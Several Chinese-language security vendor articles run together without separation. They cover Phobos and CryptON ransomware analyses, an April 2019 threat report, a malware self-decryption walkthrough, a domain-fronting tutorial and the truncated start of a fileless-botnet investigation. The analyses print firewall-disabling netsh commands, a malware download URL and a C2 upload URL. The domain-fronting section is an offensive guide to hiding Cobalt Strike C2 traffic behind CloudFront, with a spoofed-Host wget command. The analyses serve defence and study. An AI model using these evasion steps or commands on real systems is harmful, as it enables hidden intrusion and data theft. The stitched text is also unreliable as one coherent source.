背景概述

近日,深信服安全团队接到多家企业反馈,服务器遭到勒索病毒攻击,重要数据被加密。经安全团队专家排查,该病毒是近期较为活跃的一款勒索病毒,通常通过RDP暴力破解+人工投放的方式进行攻击,攻击者成功入侵后,通常会关闭系统的安全软件防护功能,运行勒索病毒,加密后会修改文件后缀为[原文件名]+id[随机字符串]+[邮箱地址].phobos,相关的邮箱地址有[email protected][email protected][email protected]等。

值得关注的是,该勒索病毒在运行过程中会进行自复制,并在注册表添加自启动项,如果没有清除系统中残留的病毒体,很可能会遭遇二次加密。

勒索特征

1.勒索信息如下所示:

00.png

01.png

2.勒索病毒加密后的文件后缀名为[原文件名]+id[随机字符串]+[邮箱地址].phobos,如下所示:

03.png

详细分析

1.获取进程Token特权信息,如下所示:

04.png

2.获取硬盘信息,如下所示:

05.png

3.解密出互斥变量名Global\00011A9E993800,创建互斥变量,如下所示:

06.png

4.提升进程权限,如下所示:

07.png

5.拷贝自身到C:\Users\panda\AppData\Local目录下,然后设置自启动注册表项,如下所示:

08.png

设置的自启动注册表项HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,如下所示:

09.png

设置的自启动注册表项

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,如下所示:

10.png

拷贝后的文件,如下所示:

11.png

6.拷贝自身到系统启动项目录,如下所示:

12.png

拷贝后的文件,如下所示:

13.png

7.创建线程,创建管道,然后通过CreateProcess调用cmd命令,删除磁盘卷影和备份操作,如下所示:

14.png

调用的相应命令,如下所示:

15.png

8.创建线程,创建管道,然后通过CreateProcess调用cmd命令,关闭防火墙,相应的命令,如下所示:

16.png

相应的命令,如下:

netsh advfirewall set currentprofile state off\nnetsh firewall set opmode mode=disable  
exit

9.解密生成相应加密后缀,如下所示:

17.png

10.解密要加密的文件后缀名列表,如下所示:

18.png

11.解密出不加密的文件名列表以及勒索信息超文件本件名info.hta,如下所示:

19.png

不加密的文件名列表,如下所示:

boot.ini、bootfontbin、ntldr、ntdetect.com、io.sys

12.解密出不加密的文件目录列表,如下所示:

20.png

相关的文件目录列表,如下所示:

C:\Windows、Program Files、Program Files(x86)

c:\windows、program files、program files(x86)

13.创建线程,遍历磁盘目录,如下所示:

21.png

14.创建线程,遍历共享目录,如下所示:

22.png

15.遍历文件,如下所示:

23.png

16.设置加密的密钥,如下所示:

24.png

加密文件,加密的后缀名为.id[1A9E9938-0001].[[email protected]].phobos,如下所示:

25.png

18.在每个磁盘根目录下生成相应的勒索信息文件info.hta和info.txt,如下所示:

26.png

解决方案

针对已经出现勒索现象的用户,由于暂时没有解密工具,建议尽快对感染主机进行断网隔离。深信服提醒广大用户尽快做好病毒检测与防御措施,防范该病毒家族的勒索攻击。

病毒防御

深信服安全团队再次提醒广大用户,勒索病毒以防为主,目前大部分勒索病毒加密后的文件都无法解密,注意日常防范措施:

1、及时给电脑打补丁,修复漏洞。

2、对重要的数据文件定期进行非本地备份。

3、不要点击来源不明的邮件附件,不从不明网站下载软件。

4、尽量关闭不必要的文件共享权限。

5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。

6、如果业务上无需使用RDP的,建议关闭RDP。

最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。

一、网络安全状况概述

2019年4月,互联网网络安全状况整体指标平稳,但各类安全事件依然时有发生。从深信服安全云脑捕获的攻击事件来看,病毒攻击手段多种多样,包括绕过杀毒软件无文件木马攻击,还有伪装国家机关发送钓鱼邮件进行攻击等,隐蔽性更强,入侵后会上传多种僵尸网络木马及挖矿程序,难以彻底清除。

信息泄露事件在4月频发,包括某平台超过1亿用户个人数据被暴露在互联网,公职人员泄露公民信息获利,三分之二的酒店网站泄露客人预订信息给第三方等,给用户人身安全、财产安全带来了隐患。此外,监测数据显示,网站攻击数量在4月小幅上升,并且CSRF跨站请求伪造、点击劫持等问题也较为严重。

4月,深信服安全云脑累计发现:

· 恶意攻击19.6亿次,平均每天拦截恶意程序6533万次。

· 活跃恶意程序30035个,其中感染型病毒6852个,占比22.81%;木马远控病毒13733个,占比45.72%。挖矿病毒种类502个,拦截次数12.29亿次,较3月上升25%,其中Minepool病毒家族最为活跃。

深信服漏洞监测平台对国内已授权的5661个站点进行漏洞监控,发现:

· 高危站点1991个,高危漏洞24495个,漏洞类别主要是CSRF跨站请求伪造,占比88%。

· 监控在线业务6724个,共识别潜在篡改的网站有179个,篡改总发现率高达2.66%。

二、恶意程序活跃详情

2019年4月,病毒攻击的态势在4月呈现上升态势,病毒拦截量比3月份上升近20%,近半年拦截恶意程序数量趋势如下图所示:

image.png

2019年4月,深信服安全云脑检测到的活跃恶意程序样本有30035个,其中木马远控病毒13733个,占比45.72%,感染型病毒6852个,占比22.81%,蠕虫病毒6461个,占比21.51%,挖矿病毒502个,占比1.67%,勒索病毒419个,占比1.4%。

4月总计拦截恶意程序19.60亿次,其中挖矿病毒的拦截量占比62.72%,其次是木马远控病毒(12.57%)、蠕虫病毒(12.5%)、感染型病毒(8.82%)、后门软件(2.31%)、勒索病毒(0.97%)。

image.png

2.1 勒索病毒活跃状况

2019年4月,共拦截活跃勒索病毒1893万次。其中,WannaCry、Razy、GandCrab依然是最活跃的勒索病毒家族,其中WannaCry家族4月拦截数量有1098万次,危害依然较大。

从勒索病毒倾向的行业来看,企业和教育感染病毒数量占总体的51%,是黑客最主要的攻击对象,具体活跃病毒行业分布如下图所示:

image.png

从勒索病毒受灾地域上看,广东地区受感染情况最为严重,其次是四川省和浙江省。

image.png

2.2 挖矿病毒活跃状况

2019年4月,深信服安全云脑在全国共拦截挖矿病毒12.29亿次,比3月上升25%,其中最为活跃的挖矿病毒是Minepool、Xmrig、Wannamine、Bitcoinminer,特别是Minepool家族,共拦截5.03亿次。同时监测数据显示,被挖矿病毒感染的地域主要有广东、浙江、北京等地,其中广东省感染量全国第一。

image.png

被挖矿病毒感染的行业分布如下图所示,其中企业受挖矿病毒感染情况最为严重,感染比例和3月基本持平,其次是政府和教育行业。

image.png

2.3 感染型病毒活跃状况

2019年4月,深信服安全云脑检测并捕获感染型病毒样本6852个,共拦截1.73亿次。其中Virut家族是4月攻击态势最为活跃的感染型病毒家族,共被拦截1.18亿次,此家族占了所有感染型病毒拦截数量的68.15%;而排名第二第三的是Sality和Wapomi家族,4月拦截比例分别是18.34%和3.96%。4月份感染型病毒活跃家族TOP榜如下图所示:

image.png

在感染型病毒危害地域分布上,广东省(病毒拦截量)位列全国第一,占TOP10总量的35%,其次为广西壮族自治区和浙江省。

image.png

从感染型病毒攻击的行业分布来看,黑客更倾向于使用感染型病毒攻击企业、教育、政府等行业。企业、教育、政府的拦截数量占拦截总量的76%,具体感染行业分布如下图所示:

image.png

2.4 木马远控病毒活跃状况

深信服安全云脑4月全国检测到木马远控病毒样本13733个,共拦截2.46亿次,拦截量较3月上升23%。其中最活跃的木马远控家族是Drivelife,拦截数量达5756万次,其次是Zusy、Injector。具体分布数据如下图所示:

image.png

对木马远控病毒区域拦截量进行分析统计发现,恶意程序拦截量最多的地区为广东省,占TOP10拦截量的 30%,较3月份有所增加;其次为浙江(13%)、北京(12%)、四川(10%)和湖北(7%)。此外山东、上海、湖南、江西、江苏的木马远控拦截量也排在前列。

image.png

行业分布上,企业、教育及政府行业是木马远控病毒的主要攻击对象。

image.png

2.5 蠕虫病毒活跃状况

2019年4月深信服安全云脑在全国检测到蠕虫病毒样本6461个,共拦截2.45亿次,但通过数据统计分析来看,大多数攻击都是来自于Ramnit、Gamarue、Jenxcus、Conficker、Dorkbot、Faedevour、Mydoom、Small家族,这些家族占据了4月全部蠕虫病毒攻击的97%,其中攻击态势最活跃的蠕虫病毒是Ramnit,占蠕虫病毒攻击总量的48.52%。

image.png

从感染地域上看,广东地区用户受蠕虫病毒感染程度最为严重,其拦截量占TOP10比例的30%;其次为湖南省(14%)、江西省(11%)。

image.png

从感染行业上看,企业、教育等行业受蠕虫感染程度较为严重。

image.png

三、网络安全攻击趋势分析

深信服全网安全态势感知平台监测到全国34808个IP在4月所受网络攻击总量约为4.8亿次。4月攻击态势较上月有小幅上升。下图为近半年深信服网络安全攻击趋势监测情况:

image.png

3.1 安全攻击趋势

下面从攻击类型分布和重点漏洞攻击分析2个纬度展示4月现网的攻击趋势:

· 攻击类型分布

通过对深信服安全云脑日志数据分析可以看到,4月捕获攻击以WebServer漏洞利用、系统漏洞利用、Web扫描、信息泄露和Webshell上传等分类为主。其中WebServer漏洞利用类型的占比更是高达52.30%,有近亿的攻击次数;系统漏洞利用类型均占比17.80%;Web扫描类型的漏洞占比7.60%。

image.png

主要攻击种类和比例如下:

image.png

· 重点漏洞攻击分析

通过对深信服安全云脑日志数据分析,针对漏洞的攻击情况筛选出4月攻击利用次数最高的漏洞TOP20。

其中攻击次数前三的漏洞分别是Apache Web Server ETag Header 信息泄露漏洞、test.php、test.aspx、test.asp等文件访问检测漏洞和Microsoft Windows Server 2008/2012 – LDAP RootDSE Netlogon 拒绝服务漏洞,攻击次数分别为21486195、18302033和18115723。整体较上月均有下降。

image.png

3.2 高危漏洞攻击趋势跟踪

深信服安全团队对重要软件漏洞进行深入跟踪分析,近年来Java中间件远程代码执行漏洞频发,同时受永恒之蓝影响使得Windows SMB、Struts2和Weblogic漏洞成为黑客最受欢迎的漏洞攻击方式。

2019年4月,Windows SMB日志量达千万级,近几月攻击持上升趋势,其中拦截到的(MS17-010)Microsoft Windows SMB Server 远程代码执行漏洞攻击利用日志最多;Struts2系列漏洞攻击趋势近几月攻击次数波动较大,Weblogic系列漏洞的攻击也程波动状态,本月仅拦截不到四十万攻击日志;PHPCMS系列漏洞结束了前几月持续上升的趋势。

· Windows SMB 系列漏洞攻击趋势跟踪情况

image.png

· Struts 2系列漏洞攻击趋势跟踪情况

image.png

· Weblogic系列漏洞攻击趋势跟踪情况

image.png

· PHPCMS系列漏洞攻击趋势跟踪情况

image.png

四、网络安全漏洞分析

4.1 全国网站漏洞类型统计

深信服网站安全监测平台本月对国内已授权的5661个站点进行漏洞监控,4月发现的高危站点1991个,高危漏洞24495个,漏洞类别主要是CSRF跨站请求伪造占比88%,详细高危漏洞类型分布如下:

image.png

具体比例如下:

image.png

4.2 篡改情况统计

4月总监控在线业务6724个,共识别潜在篡改的网站有179个,篡改总发现率高达2.66%。

其中首页篡改120个,二级页面篡改46个,多级页面篡改13个。

具体分布图如下图所示:

image.png

上图可以看出,网站首页篡改为篡改首要插入位置,成为黑客利益输出首选。

五、近期流行攻击事件及安全漏洞盘点

5.1 流行攻击事件

(1)识别使用随机后缀的勒索病毒Golden Axe

国外安全研究员在3月发现了一款名为Golden Axe的勒索病毒,Golden Axe是一款用go语言编写的勒索病毒,使用基于RSA公匙加密体系的邮件加密软件PGP开源代码对文件进行加密。具体详见:https://mp.weixin.qq.com/s/QaHJ1S-4zgH5IaUprekgHw

(2)警惕!GandCrab5.2勒索病毒伪装国家机关发送钓鱼邮件进行攻击

4月,包括金融行业在内的多家企业反馈,其内部员工收到可疑邮件。邮件发件人显示为“National Tax Service”(译为“国家税务局”),邮箱地址为[email protected],意图伪装成美国政府专用的邮箱地址gov.us,邮件内容是传讯收件人作为被告审讯。具体详见:https://mp.weixin.qq.com/s/M93V2oWuwjdtOxI9-Vz6SQ

(3)速度进,手把手教你解密Planetary勒索病毒

 国外安全研究人员曝光了一种名为Planetary的勒索病毒家族,该勒索病毒家族最早于2018年12月被发现,使用AES-256加密算法加密文件,通常通过RDP爆破或垃圾邮件进行传播,重点攻击对象是使用英语的用户群体,但在中国和日本地区都发现了遭到攻击的用户。具体详见:https://mp.weixin.qq.com/s/hoD1gqTC5IPjZhDT4o9Wdw

(4)linux挖矿病毒DDG改造后重出江湖蔓延Windows平台

在4月捕获一枚Linux、windows双平台的挖矿病毒样本,通过安全人员分析确认,该木马是通过redis漏洞传播的挖矿木马DDG的最新变种,使用当前最新的go语言1.10编译使用了大量的基础库文件,该木马会大量消耗服务器资源,难以清除并具有内网扩散功能。具体详见:https://mp.weixin.qq.com/s/cQwKQPxK2wvTcMG4GpR6xA

(5)【样本分析】门罗币挖矿+远控木马样本分析

近期,深信服安全团队在对可疑下载类样本进行分析时,发现一起门罗币挖矿+木马的双功能样本。该样本会在执行挖矿的同时,通过C2配置文件,到指定站点下载具有远控功能的样本,获取受害主机信息,并进一步控制受害主机。具体详见:https://mp.weixin.qq.com/s/MoAx0mKNi2X20JKqqCUQJQ

(6)真假文件夹?FakeFolder病毒再次捣乱企业内网

4月,接到客户反馈,内网中出现了大量伪造成文件夹的可疑exe文件,删掉以后仍会反复。经分析发现,这是一个蠕虫病毒FakeFolder,该病毒会通过U盘及共享文件夹进行传播,一旦主机感染了该病毒,文件系统中的文件夹都会被隐藏,取而代之的是一个伪装的病毒文件,当用户运行病毒文件时,也会弹出对应文件夹的窗口,因此不易被察觉;只要系统中还残留着一个FakeFolder病毒文件,就会对主机进行反复感染。具体详见:https://mp.weixin.qq.com/s/QwUEhXS-9TBHW2_Y03f8jA

(7)警惕!利用Confluence最新漏洞传播的Linux挖矿病毒seasame

4月,检测到一款新型Linux挖矿木马,经分析,该病毒利用Confluence漏洞传播,通过定时下载对病毒体进行保活,同时由于病毒会杀掉包含“https://”、“http://”的进程,将导致用户无法下载文件及访问网页,挖矿进程会导致服务器出现卡顿等异常现象。根据其母体文件名将其命名为seasame。具体详见:https://mp.weixin.qq.com/s/txIezlwy6zJt8Smmfnfz1A

(8)谨防“神秘人”勒索病毒X_Mister偷袭

4月,国外某安全论坛公布了一款类似Globelmposter的新型勒索病毒,此勒索病毒的某些行为与Globelmposter类似,因联系邮箱中带有x_mister而被命名为X_Mister(“神秘人”)勒索病毒,该勒索病毒使用RSA+DES算法加密文件,自身不具备横向感染功能,通常由攻击者对目标进行RDP爆破后手动投放,或通过垃圾邮件传播,且加密完成后会进行自删除。具体详见:https://mp.weixin.qq.com/s/UOL7HwgS-nNjxLltAroNZA

(9)警惕“侠盗”团伙利用新型漏洞传播GandCrab勒索“蓝屏”变种

近期,捕获到利用Confluence新型漏洞传播勒索病毒的事件,已有政企机构受到攻击,黑客团伙通过漏洞利用入侵服务器,上传Downloader脚本文件,连接C&C端下载运行勒索病毒。通过样本中提取的IP进行关联,该攻击事件与利用Confluence漏洞(CVE-2019-3396)传播GandCrab勒索病毒攻击事件有密切的关联。具体详见:https://mp.weixin.qq.com/s/0-5xweSvuGpDhHdNAMO6qg

5.2 安全漏洞事件

(1)【漏洞预警】Apache HTTP Server组件提权漏洞(CVE-2019-0211)

Apache HTTP Server官方发布了Apache HTTP Server 2.4.39版本的更新,该版本修复了一个漏洞编号为CVE-2019-0211提权漏洞,漏洞等级高危,根据深信服安全团队分析,该漏洞影响严重,攻击者可以通过上传攻击脚本在目标服务器上进行提权攻击,该漏洞在非*nix平台不受影响。具体详见:https://mp.weixin.qq.com/s/pc8qoDo5SKadRJ0lkJnKUQ

(2)【攻击捕获】JeeCMS漏洞竟沦为黑产SEO的秘密武器?

在4月发现客户服务器中的文件遭篡改,植入博彩页面。经排查,发现大量网页文件被篡改,且被篡改的时间非常密集。具体详见:https://mp.weixin.qq.com/s/wr5kWHmrdACh90EFzgO6jw

(3)Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)预警

4月,Apache Tomcat官方团队在最新的安全更新中披露了一则Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)。漏洞官方定级为 High,属于高危漏洞。该漏洞本质是在启用了enableCmdLineArguments的Windows上运行时,由于JRE将命令行参数传递给Windows的方式存在错误,通过此漏洞,CGI Servlet可以受到攻击者的远程执行代码攻击。具体详见:https://mp.weixin.qq.com/s/8C_WgYoc6JcNp01q_2mD9A

(4)【漏洞预警】WebLogic任意文件上传漏洞(CVE-2019-2618)

Oracle官方在最新的安全更新中披露了一则WebLogic任意文件上传漏洞(CVE-2019-2618)。漏洞官方定级为High,属于高危漏洞。该漏洞本质是通过OAM认证后,利用DeploymentService接口实现任意文件上传。攻击者可以利用该漏洞获取服务器权限。具体详见:https://mp.weixin.qq.com/s/zWnxlkqh5rvHrT9DzHBMuA

(5)【漏洞预警】Spring Cloud Config目录遍历漏洞(CVE-2019-3799)

Spring官方团队在最新的安全更新中披露了一则Spring Cloud Config目录遍历漏洞(CVE-2019-3799)。漏洞官方定级为 High,属于高危漏洞。该漏洞本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件,攻击者可以构造恶意URL实现目录遍历漏洞的利用。具体详见:https://mp.weixin.qq.com/s/6434rhIDYhIrbXW2MrTAjw

(6)【漏洞预警】WebLogic wls-async 反序列化远程命令执行漏洞

CNVD安全公告中披露了一则WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)。漏洞定级为 High,属于高危漏洞。该漏洞本质是由于 wls9-async组件在反序列化处理输入信息时存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。具体详见:https://mp.weixin.qq.com/s/Flc2eHmIystJ5sqJ33pJug

六、安全防护建议

黑客入侵的主要目标是存在通用安全漏洞的机器,所以预防病毒入侵的主要手段是发现和修复漏洞,深信服建议用户做好以下防护措施:

(一)、杜绝使用弱口令,避免一密多用

系统、应用相关的用户杜绝使用弱口令,同时,应该使用高复杂强度的密码,尽量包含大小写字母、数字、特殊符号等的混合密码,禁止密码重用的情况出现,尽量避免一密多用的情况。

(二)、及时更新重要补丁和升级组件

建议关注操作系统和组件重大更新,如永恒之蓝漏洞,使用正确渠道,如微软官网,及时更新对应补丁漏洞或者升级组件。

(三)、部署加固软件,关闭非必要端口

服务器上部署安全加固软件,通过限制异常登录行为、开启防爆破功能、防范漏洞利用,同时限制服务器及其他业务服务网可进行访问的网络、主机范围。有效加强访问控制ACL策略,细化策略粒度,按区域按业务严格限制各个网络区域以及服务器之间的访问,采用白名单机制只允许开放特定的业务必要端口,提高系统安全基线,防范黑客入侵。

四)、主动进行安全评估,加强人员安全意识

加强人员安全意识培养,不要随意点击来源不明的邮件附件,不从不明网站下载软件,对来源不明的文件包括邮件附件、上传文件等要先杀毒处理。定期开展对系统、应用以及网络层面的安全评估、渗透测试以及代码审计工作,主动发现目前系统、应用存在的安全隐患。

(五)、建立威胁情报分析和对抗体系,有效防护病毒入侵

网络犯罪分子采取的战术策略也在不断演变,其攻击方式和技术更加多样化。对于有效预防和对抗海量威胁,需要选择更强大和更智能的防护体系。

分析病毒的时候,常常遇到一种很奇怪的现象,使用查壳工具查看一个样本明明没有加壳,但是反编译或调试时,却不能直观地看到样本的恶意操作,这是为什么呢?很简单,这是因为攻击者采用了自定义的加密方法,在样本运行时实现自解密并执行真正的恶意操作,所以看到的只是样本还没解密的样子,自然分析不出恶意代码的逻辑。

下面就通过实例来窥探下恶意代码自解密的技术吧,如下是一个Ammyy病毒的下载器(MD5:28EAE907EA38B050CBDCC82BB623C00A),使用DIE查壳发现,该样本并没有加任何的壳。

图片1.png

然而当查找字符串时,却未能发现一些可疑的字符串(如下载器常有的恶意url),看到的只是一堆乱码,看来,该样本很有可能就是使用了自解密的技术。

图片2.png

反编译该样本,也难以看出它的代码逻辑,很多动态地址的call。

图片3.png

对于这种样本,反编译器很难看到一些重要的操作,因为大部分都是解密操作,所以只能通过调试器单步调了。单步调试没啥好技巧,遇到跑飞的call下断点然后重新调试。调试的时候,要注意VirtualAlloc、GlobalAlloc、HeapCreate这些函数,因为恶意代码通常使用这些函数来申请一段内存空间,来存放解密出来的恶意代码。如下图,该样本调用的是HeapCreate创建了0x230000这段内存。

图片4.png

接着恶意代码用了je + retn的方式循环解密0x230000处的数据。

图片5.png

解密完毕后,恶意代码调用call esi将执行流从0x40XXXX转到0x230000。

图片6.png

然而,0x230000处的代码并不执行核心的恶意操作,目的在于修改0x40XXXX处的原始代码。如下,它会调用VirtualProtect将0x400000的内存属性改为RW(读写),进而修改原来的代码。

图片7.png

修改后的0x400000内存段的属性如下。

图片8.png

修改完代码,调用jmp esi跳回到0x40XXXX进行执行,此时,这段内存的代码已经被修改过了,终于开始执行核心的恶意操作了。

图片9.png

将内存dump下来发现,现在的代码已经是解密后的恶意代码了,程序逻辑清晰可见,通过字符串查找可以找到待下载的病毒的url。

图片10.png

至此,该下载器的功能已经分析完毕,主要功能为从http://thespecsupportservice.com/load.png下载Ammyy病毒并运行。

图片11.png

由此,可以总结得出,恶意代码自解密的步骤一般为以下5步:申请内存 -> 复制数据 -> 解密数据 -> 跳转到堆中执行恶意代码 -> 修改原始代码并跳回执行。不过,我们可能会有个疑惑,病毒为什么不直接在堆中执行核心的恶意操作呢,还要通过修改原始代码来在0x400000空间解密执行核心的恶意代码。这是因为,一些比较高级的沙箱、杀软会监控病毒创建大片内存空间的操作,这时一旦释放出解密代码,便会立刻被沙箱、杀软检测到,所以在堆中的代码一般不会只会直接进行核心的恶意操作。

图片12.png

了解了恶意代码自解密技术后,来看看最近流行的GandCrab勒索病毒(MD5:48A673157DA3940244CE0DFB3ECB58E9),使用的也是这种自解密技术,来实现免杀。使用DIE对样本进行检测,显示并未加壳。

图片13.png

自解密的手法跟上述提到的相似,在0x1280000处申请了一段内存空间。

图片14.png

堆中的代码负责修改原始代码并跳转回去执行。

图片15.png

跳转回来后,0x403016处的代码就是解密后的核心恶意代码,接下来就可以调试GandCrab的恶意代码了。

图片16.png

将内存Dump下来,也可以分析出加密文件的代码逻辑。

图片17.png

在VT上查询该病毒的报毒情况,只有大概半数的引擎报毒,而且报出的病毒类型大多不能定位到Ransom,看来,GandCrab使用这种自解密的方式还是起到了一定的免杀效果。

图片18.png

一、样本简介

CryptON勒索病毒最早出现在2017年2月份左右,曾有多家企业遭到攻击,近日深信服安全服团队接收客户反馈,主机被加密勒索,加密后缀为x3m,经过跟踪分析,拿到了相应的样本,确认样本为CryptON勒索病毒的变种版本,并对此勒索病毒样本进行深入的分析。

二、勒索特征

1.加密后的文件后缀为id-[数字]_[[email protected]]_[[email protected]].x3m,如下所示:

01.png

2.勒索信息图片信息CVZRPKPA59ZMCHK9B.bmp,如下所示:

02.png

3.勒索超文本文件信息### HOW TO DECRYPT FILES ###.html,如下所示:

03.png

三、详细分析

1.通过解密函数,获取部分函数地址,如下所示:

04.png

2.在内存中解密出相应的勒索信息相关数据,如下所示:

05.png

解密出来的数据,如下:

06.png

3.通过多个解密函数,获取函数地址,如下所示:

07.png

4.获取主机APPDATA、LOCALAPPDATA、USERNAME、USERPROFILE变量值,如下所示:

08.png

5.判断进程运行权限是否为管理员权限,如下所示:

09.png

6.获取主机区域信息,如下所示:

10.png

如果主机区域为:RU(俄罗斯联邦)、KZ(哈萨克斯坦)、BY(白俄罗斯)、UA(乌克兰),则退出程序,如下所示:

11.png

7.设置自启动注册表项,如下所示:

12.png

8.判断主机是否联网,如果不联网,则退出程序,如下所示:

13.png

然后再生成一个[原文件]+[bat]的批处理文件,进行自删除操作,如下所示:

14.png

批处理内容,如下所示:

15.png

9.创建互斥变量,防止程序多次运行,如下所示:

16.png

10.创建线程,加密文件,如下所示:

17.png

11.创建线程,获取主机相关信息,上传到远程服务器,如下所示:

18.png

12.读取资源文件ID号CVZRPKPA59ZMCHK9T的数据,如下所示:

19.png

解密出资源的数据,然后写入到生成的勒索信息超文件本件,如下所示:

20.png

13.遍历磁盘目录文件,如下所示:

21.png

枚举共享目录文件,如下所示:

22.png

14.加密文件,如下所示:

23.png

加密后的文件,后缀名为id-[数字]_[[email protected]]_[[email protected]].x3m,如下所示:

24.png

15.将资源ID为CVZRPKPA59ZMCHK9T的数据解密出来,得到勒索信息,写入到文本文件CVZRPKPA59ZMCHK9T,如下所示:

25.png

16.将资源ID为CVZRPKPA59ZMCHK9B的数据解密出来,得到勒索信息,写入到图片文件

CVZRPKPA59ZMCHK9B,如下所示:

26.png

17.采用POST的方式,上传主机相关信息到远程服务器地址,服务器URL相关地址:

http://paris-style.ru/forum/clientscript/ie7/graphic/qp50x.php,如下所示:

27.png

获取到的数据包信息,如下所示:

28.png

四、解决方案

针对已经出现勒索现象的用户,由于暂时没有解密工具,建议尽快对感染主机进行断网隔离。深信服提醒广大用户尽快做好病毒检测与防御措施,防范该病毒家族的勒索攻击。

病毒防御

深信服安全团队再次提醒广大用户,勒索病毒以防为主,目前大部分勒索病毒加密后的文件都无法解密,注意日常防范措施:

1、及时给电脑打补丁,修复漏洞。

2、对重要的数据文件定期进行非本地备份。

3、不要点击来源不明的邮件附件,不从不明网站下载软件。

4、尽量关闭不必要的文件共享权限。

5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。

6、如果业务上无需使用RDP的,建议关闭RDP。

最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。

千里百科

Domain
Fronting基于HTTPS通用规避技术,也被称为域前端网络攻击技术。这是一种用来隐藏Metasploit,Cobalt
Strike等团队控制服务器流量,以此来一定程度绕过检查器或防火墙检测的技术,如Amazon ,Google,Akamai
等大型厂商会提供一些域前端技术服务。

下列将会使用Amazon 提供CloudFront (CDN)服务举例。

背景

在虚拟主机中搭建多个网站服务,为了方便我们区分它们,可以 IP+Port 名称 等方式去访问它们,但是如果是SSL/TLS的话。根据HTTPS的工作原理,浏览器在访问一个HTTPS站点时,先与服务器建立SSL连接。

建立连接的第一步就是请求服务器的证书。而服务器在发送证书时,是不知道浏览器访问的是哪个域名的,所以不能根据不同域名发送不同的证书。因此就引入一个扩展叫SNI,SNI是为了解决一个服务器使用多个域名和证书的SSL/TLS扩展,做法就是在
Client Hello 中补上 Host 信息。

图片1.png

图1

域前端的关键思想是在不同的通信层使用不同的域名,是一种隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。

此技术的原理为在不同通信层使用不同的域名。在明文的DNS请求和TLS服务器名称指示(SNI)中使用无害的域名来初始化连接,而实际要连接的被封锁域名仅在创建加密的HTTPS连接后发出,在Host头中携带了另一个恶意C2域名(Host头对于检查器是不可见的,但是对于接收HTTPS请求的前端服务器是可见的)。图片2.png

图2

演示

在Amazon

CloudFront是一种内容交付网络服务。它为用户提供了一个全局分布式缓存,用于托管在其服务器上的文件。这减少了客户服务器上的负载,并允许CDN提供来自与请求者数据中心的缓存内容,当客户端连接到CloudFront的时候,其根据HOST头来判断客户端想要请求的域名,在做域前置攻击时候,只要在CloudFront中挑选一个受信任域名,如"https://docs.telemetry.mozilla.org",看起来是一个合法白名单域名,将他做为前置域名来躲避防火墙审查。

图片3.png

图3

在Amazon CloudFront申请一个账户并建立一个CloudFront,在"Origin Domain Name"写入自己的C&C控制器域名如Godsong.test,其他设置按自己需求来。

图片4.png

图4

申请完毕之后会自动分发一个随机域名 xxx.cloudfront.net样式,将颁发的随机域名指向真实C2服务器,用户访问此域名时候会解析到真实的C&C服务器。

图片5.png

图5

域名前置因为使用了合法前置域名做诱饵,在使用HTTPS链接时,DNS请求的也都是合法域名,而在HOST中请求修改请求指向为我们C&C服务器,相当于请求合法域名之后把流量转发到了中转web上。

图片6.png

图6

在CloudFront为我分配了一个域名,此域名转发到我的C&C地址上,在原始C&C服务器Web存放了一个名为6.txt记事本,地址为https://www.godsong.test/6.txt

图片7.png

图7

访问Aws颁发的域名https://d305blu4121c3m.cloudfront.net/6.txt,能返回原始流量转发说明测试成功。

图片8.png

图8

使用合法白名单作为前置域名,修改Host指向为我们的C&C域名。

wget -U demo -q -O- docs.telemetry.mozilla.org/6.txt --header  
"Host:d305blu4121c3m.cloudfront.net"

如下图就成利用Mozilla白名单域名技术来隐藏真实恶意流量。

图片9.png

图9

在实际应用中,可以使用Cobalt
Strike ,Empire, Metasploit等工具修改其配置文件来控制流量传输,下文使用Cobalt
Strike演示,设置一个Profile扩展并且指定Host头为d305blu4121c3m.cloudfront.net。

图片10.png

图10

创建一个监听器,主机写Cloudfront.net分发域名,监听80端口。

图片11.png

图11

Beacon传输器使用白名单域名如下:

图片12.png

图12

在恶意程序运行后,使用Wireshark
抓取传输流量数据包。如图所示,可以看到相关请求如下,以此方法来隐藏真实C&C服务器地址,在Wireshark
中查看传输流量包Host头也同样指向我们Cloudfront服务器,一定程度上隐蔽了真实攻击机地址。

图片13.png

图13

图片14.png

图14

总结

Domain Fronting技术因为我们看到的域只是前端服务器域,很难区分那个是正常域名或恶意域名,但实际上恶意流量都要进入被控端服务器,这样的话就会在被控服务器上产生一些恶意指纹,网络数据包的大小和时间,以此方法来观察恶意特征检测等等。

参考文献

[1]https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1542139101.pdf 

图2,图6引用此文

[2]http://www.ert7.com/service/knowledge/3999.html

背景概述

近日,深信服安全团队捕获到一起绕过杀毒软件的无文件攻击事件,被入侵的主机或服务器会被安装Mykings、Mirai、暗云等多种僵尸网络木马及挖矿程序,并且难以彻底清除。经分析排查,该木马通过弱口令爆破SQL Server服务器后,利用sqlserver Transact-SQL存储C#编译恶意代码,通过MSSQL作业定时执行存储过程,在受害主机下载恶意程序。

排查过程

排查主机上的恶意文件、启动项等,发现执行恶意脚本的WMI,功能是下载文件到本地执行:

01.png

 

02.png

排查注册表启动项,存在一个BGClients,执行c:\windows\system32\wbem\123.bat,看起来十分可疑:

03.png

查看123.bat的内容,其中比较关键的操作是创建了几个隐藏目录,并且通过RegSvr32/Scrobj.dll来执行远程SCT脚本:

04.png

顺手逛一下查杀到恶意exe文件的目录,发现两个dvr后缀的文件,打开一看果不其然,包含了用于下载恶意文件的命令:

05.png

 

06.png

启动项、注册表、WMI、进程、服务、计划任务都找了一圈,再没发现其他问题,于是把以上发现的问题项统统删除,结案!

那是不可能的。

cab.exe又出现了。

而且手动删掉的一堆乱七八糟全都回来了。

